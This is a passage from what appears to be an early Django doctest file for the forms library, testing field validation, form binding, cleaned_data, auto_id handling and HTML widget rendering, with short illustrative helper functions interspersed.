>>> f.clean('abcd')
Traceback (most recent call last):
...
ValidationError: [u'Enter a four-digit number.']
RegexField also accepts min_length and max_length parameters, for convenience.
>>> f = RegexField('^\d+$', min_length=5, max_length=10)
>>> f.clean('123')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 5 characters.']
>>> f.clean('abc')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 5 characters.']
>>> f.clean('12345')
u'12345'
>>> f.clean('1234567890')
u'1234567890'
>>> f.clean('12345678901')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 10 characters.']
>>> f.clean('12345a')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
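Note the ordering above: 'abc' reports a length error rather than 'Enter a valid value.', because the length checks run before the regex match. A plain-Python sketch of that ordering (`regex_clean` is a hypothetical helper, not Django's implementation):

```python
import re

def regex_clean(value, pattern, min_length=None, max_length=None):
    """Validate length first, then the regular expression, matching
    the error ordering shown in the doctests above (sketch only)."""
    if max_length is not None and len(value) > max_length:
        raise ValueError(
            'Ensure this value has at most %d characters.' % max_length)
    if min_length is not None and len(value) < min_length:
        raise ValueError(
            'Ensure this value has at least %d characters.' % min_length)
    if not re.search(pattern, value):
        raise ValueError('Enter a valid value.')
    return value
```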
# EmailField ##################################################################
>>> f = EmailField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('person@example.com')
u'person@example.com'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('foo@')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('foo@bar')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f = EmailField(required=False)
>>> f.clean('')
u''
>>> f.clean(None)
u''
>>> f.clean('person@example.com')
u'person@example.com'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('foo@')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('foo@bar')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
EmailField also accepts min_length and max_length parameters, for convenience.
>>> f = EmailField(min_length=10, max_length=15)
>>> f.clean('a@foo.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters.']
>>> f.clean('alf@foo.com')
u'alf@foo.com'
>>> f.clean('alf123456788@foo.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 15 characters.']
# URLField ##################################################################
>>> f = URLField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('http://example.com')
u'http://example.com'
>>> f.clean('http://www.example.com')
u'http://www.example.com'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('example.com')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://example')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://example.')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://.com')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f = URLField(required=False)
>>> f.clean('')
u''
>>> f.clean(None)
u''
>>> f.clean('http://example.com')
u'http://example.com'
>>> f.clean('http://www.example.com')
u'http://www.example.com'
>>> f.clean('foo')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('example.com')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://example')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://example.')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://.com')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
URLField takes an optional verify_exists parameter, which is False by default.
When verify_exists is True, the field checks that the URL is live on the
Internet and doesn't return a 404 or 500:
>>> f = URLField(verify_exists=True)
>>> f.clean('http://www.google.com') # This will fail if there's no Internet connection
u'http://www.google.com'
>>> f.clean('http://example')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid URL.']
>>> f.clean('http://www.jfoiwjfoi23jfoijoaijfoiwjofiwjefewl.com') # bad domain
Traceback (most recent call last):
...
ValidationError: [u'This URL appears to be a broken link.']
>>> f.clean('http://google.com/we-love-microsoft.html') # good domain, bad page
Traceback (most recent call last):
...
ValidationError: [u'This URL appears to be a broken link.']
>>> f = URLField(verify_exists=True, required=False)
>>> f.clean('')
u''
>>> f.clean('http://www.google.com') # This will fail if there's no Internet connection
u'http://www.google.com'
URLField also accepts min_length and max_length parameters, for convenience.
>>> f = URLField(min_length=15, max_length=20)
>>> f.clean('http://f.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 15 characters.']
>>> f.clean('http://example.com')
u'http://example.com'
>>> f.clean('http://abcdefghijklmnopqrstuvwxyz.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 20 characters.']
# BooleanField ################################################################
>>> f = BooleanField()
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(True)
True
>>> f.clean(False)
False
>>> f.clean(1)
True
>>> f.clean(0)
False
>>> f.clean('Django rocks')
True
>>> f = BooleanField(required=False)
>>> f.clean('')
False
>>> f.clean(None)
False
>>> f.clean(True)
True
>>> f.clean(False)
False
>>> f.clean(1)
True
>>> f.clean(0)
False
>>> f.clean('Django rocks')
True
# ChoiceField #################################################################
>>> f = ChoiceField(choices=[('1', '1'), ('2', '2')])
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(1)
u'1'
>>> f.clean('1')
u'1'
>>> f.clean('3')
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. That choice is not one of the available choices.']
>>> f = ChoiceField(choices=[('1', '1'), ('2', '2')], required=False)
>>> f.clean('')
u''
>>> f.clean(None)
u''
>>> f.clean(1)
u'1'
>>> f.clean('1')
u'1'
>>> f.clean('3')
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. That choice is not one of the available choices.']
>>> f = ChoiceField(choices=[('J', 'John'), ('P', 'Paul')])
>>> f.clean('J')
u'J'
>>> f.clean('John')
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. That choice is not one of the available choices.']
# NullBooleanField ############################################################
>>> f = NullBooleanField()
>>> f.clean('')
>>> f.clean(True)
True
>>> f.clean(False)
False
>>> f.clean(None)
>>> f.clean('1')
>>> f.clean('2')
>>> f.clean('3')
>>> f.clean('hello')
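As the blank outputs above show, NullBooleanField returns None for anything it doesn't recognize as an explicit boolean. A minimal sketch of that behavior (`null_bool_clean` is a hypothetical helper, not Django's implementation):

```python
def null_bool_clean(value):
    """Pass explicit booleans through; everything else - including
    strings like '1' or 'hello' - cleans to None (sketch only)."""
    if value in (True, False):
        return bool(value)
    return None
```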
# MultipleChoiceField #########################################################
>>> f = MultipleChoiceField(choices=[('1', '1'), ('2', '2')])
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean([1])
[u'1']
>>> f.clean(['1'])
[u'1']
>>> f.clean(['1', '2'])
[u'1', u'2']
>>> f.clean([1, '2'])
[u'1', u'2']
>>> f.clean((1, '2'))
[u'1', u'2']
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a list of values.']
>>> f.clean([])
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(())
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(['3'])
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. 3 is not one of the available choices.']
>>> f = MultipleChoiceField(choices=[('1', '1'), ('2', '2')], required=False)
>>> f.clean('')
[]
>>> f.clean(None)
[]
>>> f.clean([1])
[u'1']
>>> f.clean(['1'])
[u'1']
>>> f.clean(['1', '2'])
[u'1', u'2']
>>> f.clean([1, '2'])
[u'1', u'2']
>>> f.clean((1, '2'))
[u'1', u'2']
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a list of values.']
>>> f.clean([])
[]
>>> f.clean(())
[]
>>> f.clean(['3'])
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. 3 is not one of the available choices.']
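The list handling above — rejecting non-sequences, coercing items to strings, and checking each against the choice keys — can be sketched as follows (`clean_multiple_choice` is a hypothetical helper, not Django's implementation):

```python
def clean_multiple_choice(value, choices, required=True):
    """Validate a list/tuple of selections against a choices list of
    (key, label) pairs, mirroring the doctests above (sketch only)."""
    if not value:
        if required:
            raise ValueError('This field is required.')
        return []
    if not isinstance(value, (list, tuple)):
        raise ValueError('Enter a list of values.')
    valid_keys = set(str(k) for k, label in choices)
    cleaned = [str(item) for item in value]
    for item in cleaned:
        if item not in valid_keys:
            raise ValueError(
                'Select a valid choice. %s is not one of the available choices.'
                % item)
    return cleaned
```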
# ComboField ##################################################################
ComboField takes a list of fields that should be used to validate a value,
in that order.
>>> f = ComboField(fields=[CharField(max_length=20), EmailField()])
>>> f.clean('test@example.com')
u'test@example.com'
>>> f.clean('longemailaddress@example.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 20 characters.']
>>> f.clean('not an e-mail')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f = ComboField(fields=[CharField(max_length=20), EmailField()], required=False)
>>> f.clean('test@example.com')
u'test@example.com'
>>> f.clean('longemailaddress@example.com')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 20 characters.']
>>> f.clean('not an e-mail')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid e-mail address.']
>>> f.clean('')
u''
>>> f.clean(None)
u''
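ComboField's essential behavior is a pipeline: the value is passed through each field's clean() in order, so the first failure wins. A sketch with plain callables standing in for Field objects (`combo_clean` is a hypothetical helper):

```python
def combo_clean(value, field_cleaners):
    """Run a value through a sequence of cleaning callables in order,
    the way ComboField chains its fields (sketch only)."""
    for clean in field_cleaners:
        value = clean(value)
    return value
```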
# SplitDateTimeField ##########################################################
>>> f = SplitDateTimeField()
>>> f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)])
datetime.datetime(2006, 1, 10, 7, 30)
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a list of values.']
>>> f.clean(['hello', 'there'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.', u'Enter a valid time.']
>>> f.clean(['2006-01-10', 'there'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
>>> f.clean(['hello', '07:30'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
>>> f = SplitDateTimeField(required=False)
>>> f.clean([datetime.date(2006, 1, 10), datetime.time(7, 30)])
datetime.datetime(2006, 1, 10, 7, 30)
>>> f.clean(None)
>>> f.clean('')
>>> f.clean('hello')
Traceback (most recent call last):
...
ValidationError: [u'Enter a list of values.']
>>> f.clean(['hello', 'there'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.', u'Enter a valid time.']
>>> f.clean(['2006-01-10', 'there'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid time.']
>>> f.clean(['hello', '07:30'])
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid date.']
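After each half validates, SplitDateTimeField's remaining work is just merging the [date, time] pair, which the standard library handles directly. A sketch of that final step (`combine_datetime` is a hypothetical helper; the real field validates each component first):

```python
import datetime

def combine_datetime(data_list):
    """Merge a [date, time] pair into a single datetime, as
    SplitDateTimeField does once both halves are clean (sketch only)."""
    d, t = data_list
    return datetime.datetime.combine(d, t)
```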
#########
# Forms #
#########
A Form is a collection of Fields. It knows how to validate a set of data and it
knows how to render itself in a couple of default ways (e.g., an HTML table).
You can pass it data in __init__(), as a dictionary.
# Form ########################################################################
>>> class Person(Form):
... first_name = CharField()
... last_name = CharField()
... birthday = DateField()
Pass a dictionary to a Form's __init__().
>>> p = Person({'first_name': u'John', 'last_name': u'Lennon', 'birthday': u'1940-10-9'})
>>> p.is_bound
True
>>> p.errors
{}
>>> p.is_valid()
True
>>> p.errors.as_ul()
u''
>>> p.errors.as_text()
u''
>>> p.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
>>> print p['first_name']
<input type="text" name="first_name" value="John" id="id_first_name" />
>>> print p['last_name']
<input type="text" name="last_name" value="Lennon" id="id_last_name" />
>>> print p['birthday']
<input type="text" name="birthday" value="1940-10-9" id="id_birthday" />
>>> print p['nonexistentfield']
Traceback (most recent call last):
...
KeyError: "Key 'nonexistentfield' not found in Form"
>>> for boundfield in p:
... print boundfield
<input type="text" name="first_name" value="John" id="id_first_name" />
<input type="text" name="last_name" value="Lennon" id="id_last_name" />
<input type="text" name="birthday" value="1940-10-9" id="id_birthday" />
>>> for boundfield in p:
... print boundfield.label, boundfield.data
First name John
Last name Lennon
Birthday 1940-10-9
>>> print p
<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" value="John" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" value="Lennon" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" value="1940-10-9" id="id_birthday" /></td></tr>
Empty dictionaries are valid, too.
>>> p = Person({})
>>> p.is_bound
True
>>> p.errors
{'first_name': [u'This field is required.'], 'last_name': [u'This field is required.'], 'birthday': [u'This field is required.']}
>>> p.is_valid()
False
>>> p.cleaned_data
Traceback (most recent call last):
...
AttributeError: 'Person' object has no attribute 'cleaned_data'
>>> print p
<tr><th><label for="id_first_name">First name:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="birthday" id="id_birthday" /></td></tr>
>>> print p.as_table()
<tr><th><label for="id_first_name">First name:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><ul class="errorlist"><li>This field is required.</li></ul><input type="text" name="birthday" id="id_birthday" /></td></tr>
>>> print p.as_ul()
<li><ul class="errorlist"><li>This field is required.</li></ul><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></li>
<li><ul class="errorlist"><li>This field is required.</li></ul><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /></li>
>>> print p.as_p()
<p><ul class="errorlist"><li>This field is required.</li></ul></p>
<p><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></p>
<p><ul class="errorlist"><li>This field is required.</li></ul></p>
<p><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></p>
<p><ul class="errorlist"><li>This field is required.</li></ul></p>
<p><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /></p>
If you don't pass any values to the Form's __init__(), or if you pass None,
the Form will be considered unbound and won't do any validation. Form.errors
will be an empty dictionary *but* Form.is_valid() will return False.
>>> p = Person()
>>> p.is_bound
False
>>> p.errors
{}
>>> p.is_valid()
False
>>> p.cleaned_data
Traceback (most recent call last):
...
AttributeError: 'Person' object has no attribute 'cleaned_data'
>>> print p
<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" id="id_birthday" /></td></tr>
>>> print p.as_table()
<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" id="id_first_name" /></td></tr>
<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" id="id_last_name" /></td></tr>
<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" id="id_birthday" /></td></tr>
>>> print p.as_ul()
<li><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></li>
<li><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></li>
<li><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /></li>
>>> print p.as_p()
<p><label for="id_first_name">First name:</label> <input type="text" name="first_name" id="id_first_name" /></p>
<p><label for="id_last_name">Last name:</label> <input type="text" name="last_name" id="id_last_name" /></p>
<p><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" id="id_birthday" /></p>
Unicode values are handled properly.
>>> p = Person({'first_name': u'John', 'last_name': u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111', 'birthday': '1940-10-9'})
>>> p.as_table()
u'<tr><th><label for="id_first_name">First name:</label></th><td><input type="text" name="first_name" value="John" id="id_first_name" /></td></tr>\n<tr><th><label for="id_last_name">Last name:</label></th><td><input type="text" name="last_name" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" id="id_last_name" /></td></tr>\n<tr><th><label for="id_birthday">Birthday:</label></th><td><input type="text" name="birthday" value="1940-10-9" id="id_birthday" /></td></tr>'
>>> p.as_ul()
u'<li><label for="id_first_name">First name:</label> <input type="text" name="first_name" value="John" id="id_first_name" /></li>\n<li><label for="id_last_name">Last name:</label> <input type="text" name="last_name" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" id="id_last_name" /></li>\n<li><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" value="1940-10-9" id="id_birthday" /></li>'
>>> p.as_p()
u'<p><label for="id_first_name">First name:</label> <input type="text" name="first_name" value="John" id="id_first_name" /></p>\n<p><label for="id_last_name">Last name:</label> <input type="text" name="last_name" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" id="id_last_name" /></p>\n<p><label for="id_birthday">Birthday:</label> <input type="text" name="birthday" value="1940-10-9" id="id_birthday" /></p>'
>>> p = Person({'last_name': u'Lennon'})
>>> p.errors
{'first_name': [u'This field is required.'], 'birthday': [u'This field is required.']}
>>> p.is_valid()
False
>>> p.errors.as_ul()
u'<ul class="errorlist"><li>first_name<ul class="errorlist"><li>This field is required.</li></ul></li><li>birthday<ul class="errorlist"><li>This field is required.</li></ul></li></ul>'
>>> print p.errors.as_text()
* first_name
* This field is required.
* birthday
* This field is required.
>>> p.cleaned_data
Traceback (most recent call last):
...
AttributeError: 'Person' object has no attribute 'cleaned_data'
>>> p['first_name'].errors
[u'This field is required.']
>>> p['first_name'].errors.as_ul()
u'<ul class="errorlist"><li>This field is required.</li></ul>'
>>> p['first_name'].errors.as_text()
u'* This field is required.'
>>> p = Person()
>>> print p['first_name']
<input type="text" name="first_name" id="id_first_name" />
>>> print p['last_name']
<input type="text" name="last_name" id="id_last_name" />
>>> print p['birthday']
<input type="text" name="birthday" id="id_birthday" />
cleaned_data will always *only* contain keys for fields defined in the
Form, even if you pass extra data when you instantiate the Form. In this
example, we pass a bunch of extra fields to the form constructor,
but cleaned_data contains only the form's fields.
>>> data = {'first_name': u'John', 'last_name': u'Lennon', 'birthday': u'1940-10-9', 'extra1': 'hello', 'extra2': 'hello'}
>>> p = Person(data)
>>> p.is_valid()
True
>>> p.cleaned_data
{'first_name': u'John', 'last_name': u'Lennon', 'birthday': datetime.date(1940, 10, 9)}
cleaned_data will include a key and value for *all* fields defined in the Form,
even if the Form's data didn't include a value for fields that are not
required. In this example, the data dictionary doesn't include a value for the
"nick_name" field, but cleaned_data includes it. For CharFields, it's set to the
empty string.
>>> class OptionalPersonForm(Form):
... first_name = CharField()
... last_name = CharField()
... nick_name = CharField(required=False)
>>> data = {'first_name': u'John', 'last_name': u'Lennon'}
>>> f = OptionalPersonForm(data)
>>> f.is_valid()
True
>>> f.cleaned_data
{'nick_name': u'', 'first_name': u'John', 'last_name': u'Lennon'}
For DateFields, it's set to None.
>>> class OptionalPersonForm(Form):
... first_name = CharField()
... last_name = CharField()
... birth_date = DateField(required=False)
>>> data = {'first_name': u'John', 'last_name': u'Lennon'}
>>> f = OptionalPersonForm(data)
>>> f.is_valid()
True
>>> f.cleaned_data
{'birth_date': None, 'first_name': u'John', 'last_name': u'Lennon'}
"auto_id" tells the Form to add an "id" attribute to each form element.
If it's a string that contains '%s', Django will use that as a format string
into which the field's name will be inserted. It will also put a <label> around
the human-readable labels for a field.
>>> p = Person(auto_id='%s_id')
>>> print p.as_table()
<tr><th><label for="first_name_id">First name:</label></th><td><input type="text" name="first_name" id="first_name_id" /></td></tr>
<tr><th><label for="last_name_id">Last name:</label></th><td><input type="text" name="last_name" id="last_name_id" /></td></tr>
<tr><th><label for="birthday_id">Birthday:</label></th><td><input type="text" name="birthday" id="birthday_id" /></td></tr>
>>> print p.as_ul()
<li><label for="first_name_id">First name:</label> <input type="text" name="first_name" id="first_name_id" /></li>
<li><label for="last_name_id">Last name:</label> <input type="text" name="last_name" id="last_name_id" /></li>
<li><label for="birthday_id">Birthday:</label> <input type="text" name="birthday" id="birthday_id" /></li>
>>> print p.as_p()
<p><label for="first_name_id">First name:</label> <input type="text" name="first_name" id="first_name_id" /></p>
<p><label for="last_name_id">Last name:</label> <input type="text" name="last_name" id="last_name_id" /></p>
<p><label for="birthday_id">Birthday:</label> <input type="text" name="birthday" id="birthday_id" /></p>
If auto_id is any True value whose str() does not contain '%s', the "id"
attribute will be the name of the field.
>>> p = Person(auto_id=True)
>>> print p.as_ul()
<li><label for="first_name">First name:</label> <input type="text" name="first_name" id="first_name" /></li>
<li><label for="last_name">Last name:</label> <input type="text" name="last_name" id="last_name" /></li>
<li><label for="birthday">Birthday:</label> <input type="text" name="birthday" id="birthday" /></li>
If auto_id is any False value, an "id" attribute won't be output unless it
was manually entered.
>>> p = Person(auto_id=False)
>>> print p.as_ul()
<li>First name: <input type="text" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
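The three cases above follow one rule, which can be sketched as a small helper (an illustration of the documented behavior, not Django's actual code):

```python
def html_id(auto_id, field_name):
    """Return the id attribute for a field, or None for no id at all."""
    if auto_id and '%s' in str(auto_id):
        # a format string: interpolate the field name into it
        return str(auto_id) % field_name
    if auto_id:
        # any other true value: use the bare field name
        return field_name
    # a false value: no id attribute
    return None

print(html_id('%s_id', 'first_name'))  # first_name_id
print(html_id(True, 'first_name'))     # first_name
print(html_id(False, 'first_name'))    # None
```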
In this example, auto_id is False, but the "id" attribute for the "first_name"
field is given manually. Also note that this field gets a <label>, while the
others don't.
>>> class PersonNew(Form):
... first_name = CharField(widget=TextInput(attrs={'id': 'first_name_id'}))
... last_name = CharField()
... birthday = DateField()
>>> p = PersonNew(auto_id=False)
>>> print p.as_ul()
<li><label for="first_name_id">First name:</label> <input type="text" id="first_name_id" name="first_name" /></li>
<li>Last name: <input type="text" name="last_name" /></li>
<li>Birthday: <input type="text" name="birthday" /></li>
If the "id" attribute is specified in the Form and auto_id is True, the "id"
attribute in the Form takes precedence.
>>> p = PersonNew(auto_id=True)
>>> print p.as_ul()
<li><label for="first_name_id">First name:</label> <input type="text" id="first_name_id" name="first_name" /></li>
<li><label for="last_name">Last name:</label> <input type="text" name="last_name" id="last_name" /></li>
<li><label for="birthday">Birthday:</label> <input type="text" name="birthday" id="birthday" /></li>
>>> class SignupForm(Form):
... email = EmailField()
... get_spam = BooleanField()
>>> f = SignupForm(auto_id=False)
>>> print f['email']
<input type="text" name="email" />
>>> print f['get_spam']
<input type="checkbox" name="get_spam" />
>>> f = SignupForm({'email': 'test@example.com', 'get_spam': True}, auto_id=False)
>>> print f['email']
<input type="text" name="email" value="test@example.com" />
>>> print f['get_spam']
<input checked="checked" type="checkbox" name="get_spam" />
Any Field can have a Widget class passed to its constructor:
>>> class ContactForm(Form):
... subject = CharField()
... message = CharField(widget=Textarea)
>>> f = ContactForm(auto_id=False)
>>> print f['subject']
<input type="text" name="subject" />
>>> print f['message']
<textarea rows="10" cols="40" name="message"></textarea>
as_textarea(), as_text() and as_hidden() are shortcuts for changing the output
widget type:
>>> f['subject'].as_textarea()
u'<textarea rows="10" cols="40" name="subject"></textarea>'
>>> f['message'].as_text()
u'<input type="text" name="message" />'
>>> f['message'].as_hidden()
u'<input type="hidden" name="message" />'
The 'widget' parameter to a Field can also be an instance:
>>> class ContactForm(Form):
... subject = CharField()
... message = CharField(widget=Textarea(attrs={'rows': 80, 'cols': 20}))
>>> f = ContactForm(auto_id=False)
>>> print f['message']
<textarea rows="80" cols="20" name="message"></textarea>
Instance-level attrs are *not* carried over to as_textarea(), as_text() and
as_hidden():
>>> f['message'].as_text()
u'<input type="text" name="message" />'
>>> f = ContactForm({'subject': 'Hello', 'message': 'I love you.'}, auto_id=False)
>>> f['subject'].as_textarea()
u'<textarea rows="10" cols="40" name="subject">Hello</textarea>'
>>> f['message'].as_text()
u'<input type="text" name="message" value="I love you." />'
>>> f['message'].as_hidden()
u'<input type="hidden" name="message" value="I love you." />'
For a form with a <select>, use ChoiceField:
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('P', 'Python'), ('J', 'Java')])
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select name="language">
<option value="P">Python</option>
<option value="J">Java</option>
</select>
>>> f = FrameworkForm({'name': 'Django', 'language': 'P'}, auto_id=False)
>>> print f['language']
<select name="language">
<option value="P" selected="selected">Python</option>
<option value="J">Java</option>
</select>
A subtlety: If one of the choices' values is the empty string and the form is
unbound, then the <option> for the empty-string choice will get selected="selected".
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('', '------'), ('P', 'Python'), ('J', 'Java')])
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select name="language">
<option value="" selected="selected">------</option>
<option value="P">Python</option>
<option value="J">Java</option>
</select>
You can specify widget attributes in the Widget constructor.
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('P', 'Python'), ('J', 'Java')], widget=Select(attrs={'class': 'foo'}))
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select class="foo" name="language">
<option value="P">Python</option>
<option value="J">Java</option>
</select>
>>> f = FrameworkForm({'name': 'Django', 'language': 'P'}, auto_id=False)
>>> print f['language']
<select class="foo" name="language">
<option value="P" selected="selected">Python</option>
<option value="J">Java</option>
</select>
When passing a custom widget instance to ChoiceField, note that setting
'choices' on the widget is meaningless. The widget will use the choices
defined on the Field, not the ones defined on the Widget.
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('P', 'Python'), ('J', 'Java')], widget=Select(choices=[('R', 'Ruby'), ('P', 'Perl')], attrs={'class': 'foo'}))
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select class="foo" name="language">
<option value="P">Python</option>
<option value="J">Java</option>
</select>
>>> f = FrameworkForm({'name': 'Django', 'language': 'P'}, auto_id=False)
>>> print f['language']
<select class="foo" name="language">
<option value="P" selected="selected">Python</option>
<option value="J">Java</option>
</select>
You can set a ChoiceField's choices after the fact.
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField()
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<select name="language">
</select>
>>> f.fields['language'].choices = [('P', 'Python'), ('J', 'Java')]
>>> print f['language']
<select name="language">
<option value="P">Python</option>
<option value="J">Java</option>
</select>
Add widget=RadioSelect to use that widget with a ChoiceField.
>>> class FrameworkForm(Form):
... name = CharField()
... language = ChoiceField(choices=[('P', 'Python'), ('J', 'Java')], widget=RadioSelect)
>>> f = FrameworkForm(auto_id=False)
>>> print f['language']
<ul>
<li><label><input type="radio" name="language" value="P" /> Python</label></li>
<li><label><input type="radio" name="language" value="J" /> Java</label></li>
</ul>
>>> print f
<tr><th>Name:</th><td><input type="text" name="name" /></td></tr>
<tr><th>Language:</th><td><ul>
<li><label><input type="radio" name="language" value="P" /> Python</label></li>
<li><label><input type="radio" name="language" value="J" /> Java</label></li>
</ul></td></tr>
>>> print f.as_ul()
<li>Name: <input type="text" name="name" /></li>
<li>Language: <ul>
<li><label><input type="radio" name="language" value="P" /> Python</label></li>
<li><label><input type="radio" name="language" value="J" /> Java</label></li>
</ul></li>
Regarding auto_id and <label>, RadioSelect is a special case. Each radio button
